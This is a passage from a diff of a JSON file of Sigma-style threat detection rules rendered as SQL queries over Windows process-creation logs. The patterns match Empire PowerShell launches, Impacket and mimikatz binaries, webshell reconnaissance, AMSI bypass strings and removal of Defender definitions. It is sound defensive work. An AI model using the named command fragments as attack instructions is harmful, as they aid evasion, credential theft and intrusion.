'%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "title": "Esentutl Steals Browser Information", + "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "status": "experimental", + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_esentutl_webcache.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", - "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "New Network Trace Capture Started Via Netsh.EXE", - "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", - "author": "Kutepov Anton, oscd.community", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administration activity" + "Other tools that incidentally use the same command line parameters" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_packet_capture.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious MsiExec Embedding Parent", + "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "status": "experimental", + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "author": "frack113", "tags": [ + "attack.t1218.007", "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_msiexec_embedding.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of the impacket tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "PowerShell Download Pattern", - "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "status": "test", - "description": "Detects a Powershell process that contains download commands in its command line string", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "status": "experimental", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_patterns.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "Suspicious Execution of InstallUtil Without Log", - "id": "d042284c-a296-4988-9be5-f424fadcc28c", + "title": "Windows Defender Definition Files Removed", + "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "status": "test", - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND NewProcessName LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_instalutil_no_log_execution.yml" + "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Use of UltraVNC Remote Access Software", - "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "title": "Lolbin Ssh.exe Use As Proxy", + "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "author": "frack113", + "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Legitimate usage for administration purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_ultravnc.yml" + "filename": "proc_creation_win_lolbin_ssh.yml" }, { - "title": "Automated Collection Command Prompt", - "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "title": "LOLBIN From Abnormal Drive", + "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti'", "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur on servers with multiple drives." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'CALC.EXE', 'MSHTA.EXE', 'cscript.exe', 'wscript.exe', 'REGSVR32.EXE', 'installutil.exe', 'CMSTP.EXE')) AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\') OR (CurrentDirectory = '') OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_susp_automated_collection.yml" + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" }, { - "title": "Use of TTDInject.exe", - "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", "status": "experimental", - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "author": "frack113", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Legitimate use" + "Administrative activity using a remote port forwarding to a local port" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ttdinject.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Windows Processes Suspicious Parent Directory", - "id": "96036718-71cc-4027-a538-d1587e0006a7", - "status": "test", - "description": "Detect suspicious parent processes of well-known Windows processes", - "author": "vburov", + "title": "Use Short Name Path in Command Line", + "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "status": "experimental", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036.005" + "attack.t1564.004" ], "falsepositives": [ - "Some security products seem to spawn these" + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 